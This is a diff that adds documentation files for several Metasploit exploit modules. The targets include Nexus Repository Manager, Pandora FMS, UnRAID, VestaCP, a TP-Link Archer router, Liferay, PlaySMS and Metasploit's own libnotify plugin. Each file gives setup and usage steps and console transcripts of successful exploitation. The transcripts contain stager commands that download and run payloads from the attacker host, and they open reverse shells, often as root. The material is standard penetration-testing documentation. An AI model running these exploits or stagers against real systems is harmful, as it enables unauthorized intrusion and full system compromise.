+Module options (exploit/linux/http/nexus_repo_manager_el_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    yes       Nexus password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8081             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Nexus username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nexus Repository Manager <= 3.21.1
+
+
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
+[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
+[*] Logging in with admin:admin
+[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
+[*] Using URL: http://0.0.0.0:8080/t6NXrxF
+[*] Local IP: http://192.168.1.3:8080/t6NXrxF
+[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
+[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
+[*] Sending payload to 192.168.1.3 (curl/7.61.1)
+[*] Command Stager progress -  50.00% done (54/108 bytes)
+[*] Executing command: chmod +x /tmp/hgzeytII
+[+] Successfully executed command: chmod +x /tmp/hgzeytII
+[*] Command Stager progress -  70.37% done (76/108 bytes)
+[*] Executing command: /tmp/hgzeytII
+[+] Successfully executed command: /tmp/hgzeytII
+[*] Command Stager progress -  82.41% done (89/108 bytes)
+[*] Executing command: rm -f /tmp/hgzeytII
+[+] Successfully executed command: rm -f /tmp/hgzeytII
+[*] Command Stager progress - 100.00% done (108/108 bytes)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+Pandora FMS (for Pandora Flexible Monitoring System) is software for
+monitoring computer networks. Pandora FMS allows monitoring in a visual
+way the status and performance of several parameters from different
+operating systems, servers, applications and hardware systems such
+as firewalls, proxies, databases, web servers or routers.
+
+This module exploits a vulnerability found in Pandora FMS 7.0 NG and lower.
+The vulnerability exists on the `net_tools.php` component, due to the insecure
+usage of the `system()` PHP function.
+
+This module has been tested with [Pandora FMS 7.0 NG](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip/download)
+
+## Verification Steps
+
+Launch metasploit and set the appropriate options:
+
+1.  Start `msfconsole`
+2. `use exploit/linux/http/pandora_ping_cmd_exec`
+3. `set RHOSTS <rhosts>`
+4. `set LHOST <lhost>`
+5. `set USERNAME <username>`
+6. `set PASSWORD <password>`
+7. `exploit`
+
+## Options
+
+  **USERNAME**
+
+  The username for Pandora FMS.
+
+  **PASSWORD**
+
+  The password for Pandora FMS.
+
+
+## Setup
+
+https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing
+
+## Scenarios
+
+ Tested Pandora FMS 7.0 NG on CentOS 7.3.1611
+
+```
+msf5 > use exploit/linux/http/pandora_ping_cmd_exec
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128
+RHOSTS => 192.168.215.128
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12
+RHOSTS => 192.168.1.12
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5
+LHOST => 192.168.1.5
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora
+PASSWORD => pandora
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444
+[*] Exploiting...
+[*] Using URL: http://0.0.0.0:8080/ksdtisFA
+[*] Local IP: http://192.168.1.5:8080/ksdtisFA
+[*] Attempting to authenticate using (admin:pandora)
+[+] Successfully authenticated
+[*] Attempting to retrieve session cookie
+[+] Successfully retrieved session cookie: PHPSESSID=knoo75fs75l00ec74atu8ic3d0; clippy=deleted; clippy=deleted;
+[*] Client 192.168.1.12 (Wget/1.14 (linux-gnu)) requested /ksdtisFA
+[*] Sending payload to 192.168.1.12 (Wget/1.14 (linux-gnu))
+[*] Sending stage (989416 bytes) to 192.168.1.12
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.12:54784) at 2020-03-09 15:38:25 +0300
+
+[*] Command Stager progress - 131.25% done (147/112 bytes)
+[*] Server stopped.
+
+meterpreter >
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.
+
+### Description
+
+This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
+performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
+
+### Testing Environment
+
+Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
+according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
+
+## Verification Steps
+
+  1. Setup UnRAID 6.8.0
+  2. Start `msfconsole`
+  3. `use exploit/linux/http/unraid_auth_bypass_exec`
+  4. `set RHOST [UNRAID]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+## Options
+
+  **TARGETURI** : The URI of the Unraid application
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
+RHOSTS => 10.10.0.173
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
+[*] 10.10.0.173:80 - The target appears to be vulnerable.
+msf5 exploit(linux/http/unraid_auth_bypass_exec) > run
+
+[*] Started reverse TCP handler on 10.10.0.161:4444 
+[*] Sending stage (38288 bytes) to 10.10.0.173
+[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
+[+] Request timed out, OK if running a non-forking/blocking payload...
+
+meterpreter > getuid
+Server username: root (0)
+```
@@ -0,0 +1,120 @@
+## Vulnerable Application
+This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user.
+
+To exploit this vulnerability, an authenticated attacker with low privileges can request VestaCP backup a file whose file name starts with a '.', followed by the ';' character to escape the current command, and finally the command they wish to execute. During the user backup process, this file name will be evaluated by the v-backup-user bash script, which will not perform appropriate input validation prior to passing this file name to an eval() call. As result, when an attacker tries to list existing backups the injected command will be executed by the v-backup-user bash script and will result in the attacker's injected command being executed as the root user.
+
+## Installing the Vulnerable Application on Ubuntu 18.03 LTS
+
+You can install Vesta Control Panel on Ubuntu 18.04 LTS server with the following commands:
+
+```
+ssh root@your.server
+curl -O http://vestacp.com/pub/vst-install.sh
+bash vst-install.sh
+```
+
+Once you have finished the installation, perform the following actions in order to create a unprivileged user:
+
+1 - Go to https://*IP ADDR*:8083/
+
+2 - Login with your administrator account.
+
+3 - Click on the "User" section under the top navigation menu. When you move your mouse over the text for
+the "User" section, it will turn orange. This is the link that you need to click!
+
+4 - The URL in your browser should now be https://*IP ADDR*:8083/list/user/
+
+5 - Click on the green plus sign on the left side of the page. When you move your mouse
+over this button, it will say "ADD USER".
+
+6 - In the following user creation form that appears, enter values for the "user", "password", "email", "first name",
+and "last name" fields. Leave package and language options as is, as these fields do not affect exploitation.
+
+7 - Log out of your admin account.
+
+8 - Browse to https://*IP ADDR*:8083/
+
+9 - Verify that the new low privileged user has been created and that you can log in using their credentials.
+
+
+
+## Verification Steps
+
+A successful check of the exploit will look similar to the output shown below:
+
+1. Start `msfconsole`
+2. `use exploit/linux/http/vestacp_exec`
+3. Set `RHOST`
+4. Set `LHOST`
+4. Set `USERNAME`
+4. Set `PASSWORD`
+4. Set `SRVHOST`
+4. Set `SRVPORT`
+7. Run `exploit`
+8. **Verify** that you are seeing `Successfully authenticated to the FTP service` in the console.
+9. **Verify** that you are seeing `Successfully uploaded the payload as a file name` in the console.
+9. **Verify** that you are seeing `Successfully authenticated to the HTTP Service` in the console.
+9. **Verify** that you are seeing `Scheduled backup has ben started. Exploitation may take up to 5 minutes.` in the console.
+9. **Verify** that you are seeing `It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...` in the console.
+9. **Verify** that you are seeing `First stage is executed ! Sending 2nd stage of the payload` in the console.
+15. **Verify** that you are getting a Meterpreter session.
+
+## Ubuntu 18.04 LTS with VestaCP 0.9.26
+
+```
+msf5 > use exploit/linux/http/vestacp_exec
+msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
+RHOSTS => 192.168.74.218
+msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
+USERNAME => user11
+msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
+PASSWORD => qwe123
+msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
+LHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
+SRVHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
+SRVPORT => 8081
+msf5 exploit(linux/http/vestacp_exec) > run
+[*] Exploit running as background job 32.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.74.1:4444
+[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
+msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
+[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
+[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
+[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
+[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
+[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
+[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
+[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
+[+] 192.168.74.218:8083 - Scheduled backup has been started !
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
+[*] Sending stage (53755 bytes) to 192.168.74.218
+[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
+
+msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
+[*] Starting interaction with 8...
+
+meterpreter > shell
+Process 42978 created.
+Channel 1 created.
+/bin/sh: 0: can't access tty; job control turned off
+# id
+uid=0(root) gid=0(root) groups=0(root)
+meterpreter > shell
+[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
+
+#
+```
@@ -0,0 +1,93 @@
+## Description
+
+This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
+The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.
+
+This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski).
+
+## Vulnerable Application
+
+TP-Link Archer A7 (AC1750) v5 firmware version 190726
+TP-Link Archer C7 (AC1750) v5 firmware version 190726
+
+[Firmware TP-Link Archer A7](https://static.tp-link.com/2019/201908/20190827/Archer%20A7(EU)_V5_190811.zip)
+[Firmware TP-Link Archer C7](https://static.tp-link.com/2019/201908/20190816/Archer%20C7(EU)_V5_190726.zip)
+
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Connect to a target on the LAN interface
+  2. Start msfconsole
+  3. Do: ```use exploits/linux/misc/tplink_archer_a7_c7_lan_rce```
+  4. Set RHOST, LHOST and SRVHOST
+  5. Do ```check```
+  6. Do: ```run```
+  7. You should get a shell.
+ 
+## Options
+```
+Module options (exploit/linux/misc/tplink_archerC7_lan_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    20002            yes       The target port (TCP)
+   SRVHOST                   yes       IP address of the host serving the exploit
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/mipsbe/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+```
+
+## Scenarios
+~~~
+msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1
+RHOST => 192.168.0.1
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238
+LHOST => 192.168.0.238
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238
+SRVHOST => 192.168.0.238
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check 
+[+] 192.168.0.1:20002 - The target is vulnerable.
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > 
+[*] Started reverse TCP handler on 192.168.0.238:4444 
+[*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)
+[*] Starting up our web service on http://192.168.0.238:4445 ...
+[*] Using URL: http://192.168.0.238:4445/x
+[*] 192.168.0.1:20002 - Connecting to the target
+[*] 192.168.0.1:20002 - Sending command file byte by byte
+[*] 192.168.0.1:20002 - Command: wget http://192.168.0.238:4445/x;chmod +x x;./x
+[*] 192.168.0.1:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]
+[*] 192.168.0.1:20002 - Command file sent, attempting to execute...
+[+] 192.168.0.1:20002 - Sending executable to the router
+[+] 192.168.0.1:20002 - Sit back and relax, Shelly will come visit soon!
+[*] Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:48112) at 2020-03-26 16:47:09 +0100
+[*] Server stopped.
+
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux ArcherC7v5 3.3.8 #1 Mon May 20 18:53:02 CST 2019 mips GNU/Linux
+~~~
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java unmarshalling vulnerability via JSONWS in
+Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
+GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
+
+### Setup
+
+Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
+Follow the instructions for your platform and distribution (if using
+Linux). If you're using OS X, you may prefer to `brew cask install docker`
+after installing [Homebrew](https://brew.sh/).
+
+**Note:** You may want to increase Docker's memory capacity up to 4 GB.
+Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.
+
+Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
+added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).
+Any dependencies will be pulled automatically.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This targets Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4,
+and 7.2.1 GA2.
+
+## Options
+
+### SRVPORT
+
+If you are testing the [Docker container](#setup), which binds to port
+8080 by default, set this to a different port to avoid a port conflict
+with the remote classloading server.
+
+## Scenarios
+
+### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)
+
+```
+msf5 > use exploit/multi/http/liferay_java_unmarshalling
+msf5 exploit(multi/http/liferay_java_unmarshalling) > options
+
+Module options (exploit/multi/http/liferay_java_unmarshalling):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2
+
+
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
+srvport => 8888
+msf5 exploit(multi/http/liferay_java_unmarshalling) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
+[*] Using URL: http://0.0.0.0:8888/
+[*] Local IP: http://192.168.1.3:8888/
+[+] Started remote classloader server at http://192.168.1.3:8888/
+[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
+[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
+[+] Sending constructor class
+[*] GET /metasploit/Payload.class requested
+[+] Sending payload class
+[*] HEAD /metasploit.dat requested
+[+] Sending 200
+[*] GET /metasploit.dat requested
+[+] Sending payload config
+[*] HEAD /metasploit/Payload.class requested
+[+] Sending 200
+[*] GET /metasploit/Payload.class requested
+[+] Sending payload class
+[*] Sending stage (53928 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: liferay
+meterpreter > sysinfo
+Computer    : 588a96d744cb
+OS          : Linux 4.19.76-linuxkit (amd64)
+Meterpreter : java/linux
+meterpreter >
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL' which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a second time, results in code execution.
+
+The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
+
+### Setup
+
+Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download).
+
+ 1. Download the application
+ 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
+ 3. Move in to the web directory : `mv playsms-1.4.2/web/* /var/www/html/`
+ 4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
+ 5. Change the owner : `chown -R www-data:www-data /var/www/html/`
+ 6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql in to your playsms database
+ 7. Now visit : http://localhost/
+
+## Verification Steps
+
+ 1. Install the application (Tested on HactheBox Frolic Machine)
+ 2. Start msfconsole
+ 3. Do: `use exploit/multi/http/playsms_template_injection`
+ 4. Do: `set rport <port>`
+ 5. Do: `set rhost <ip>`
+ 6. Do: `set targeturi /playsms`
+ 7. Do: `check`
+
+```
+[*] 10.10.10.111:9999 - The target appears to be vulnerable.
+```
+
+ 10. Do: `set lport <port>`
+ 11. Do: `set lhost <ip>`
+ 12. Do: `run`
+ 13. You should get a shell.
+
+## Scenarios
+
+### Playsms on Ubuntu Linux
+
+```
+msf5 exploit(multi/http/playsms_template_injection) > options
+
+Module options (exploit/multi/http/playsms_template_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base playsms directory path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PlaySMS Before 1.4.3
+
+
+msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(multi/http/playsms_template_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f
+[*] Trying to Send Payload in Username Field ......
+[+] Payload successfully sent
+[*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3;
+[*] Sending stage (38288 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500
+
+meterpreter > getuid
+Server username: www-data (1000)
+meterpreter > sysinfo
+Computer    : ec31d13f3520
+OS          : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
+This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. The `Open VMware USB Arbitrator Service` can be
 launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
 directory in a specific folder, and creating a hard link to the `Open VMware USB Arbitrator Service`, we're able to launch it
 temporarily to start our payload with an effective UID of 0.
@@ -0,0 +1,130 @@
+## Vulnerable Application
+
+Metasploit Framework versions prior to 5.0.86 are vulnerable to a command
+injection vulnerability in the default `libnotify` plugin. The `libnotify`
+plugin fails to properly parse the argument array to an executed operating
+system command. If an attacker can convince a user running an affected version
+of the Metasploit Framework with the `libnotify` plugin loaded to import a
+specially crafted data file with `db_import`, they can execute a command within
+the context of the user running Metasploit.
+
+In order to trigger the vulnerable code path, the service reported must be
+unique. This means that when the exploit file is loaded, it will not trigger the
+vulnerability again unless the service is removed. The easiest way to remove the
+service is to delete all services from the database using the `services -d`
+command.
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/unix/fileformat/metasploit_libnotify_cmd_injection`
+  4. Set options as appropriate
+  5. Do: `exploit`
+  6. Start a payload handler using `exploit/multi/handler`
+  7. Transfer the file to the intended target and convince them to open it
+
+## Scenarios
+
+### Metasploit Framework v5.0.76
+
+
+```
+msf5 > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection 
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options 
+
+Module options (exploit/unix/fileformat/metasploit_libnotify_cmd_injection):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   FILENAME  scan.xml         no        The file to write.
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/bash        yes       The system shell to use.
+
+   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit
+
+[*] Writing xml file: scan.xml
+[+] scan.xml stored at /home/smcintyre/.msf4/local/scan.xml
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler 
+msf5 exploit(multi/handler) > show options 
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/bash        yes       The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf5 exploit(multi/handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+^C[-] Exploit failed [user-interrupt]: Interrupt 
+[-] exploit: Interrupted
+msf5 exploit(multi/handler) > exploit -j
+[*] Exploit running as background job 3.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+msf5 exploit(multi/handler) > version
+Framework: 5.0.76-dev-50cfb07cff
+Console  : 5.0.76-dev-50cfb07cff
+msf5 exploit(multi/handler) > load libnotify
+[*] Successfully loaded plugin: libnotify
+msf5 exploit(multi/handler) > services -d
+Services
+========
+
+host  port  proto  name  state  info
+----  ----  -----  ----  -----  ----
+
+msf5 exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml
+[*] Importing 'Nmap XML' data
+[*] Import: Parsing with 'Nokogiri v1.10.8'
+[*] Importing host 192.168.20.121
+sh: line 1: State:: command not found
+sh: line 2: Proto:: command not found
+sh: -c: line 3: unexpected EOF while looking for matching `''
+sh: -c: line 4: syntax error: unexpected end of file
+[*] Successfully imported /home/smcintyre/.msf4/local/scan.xml
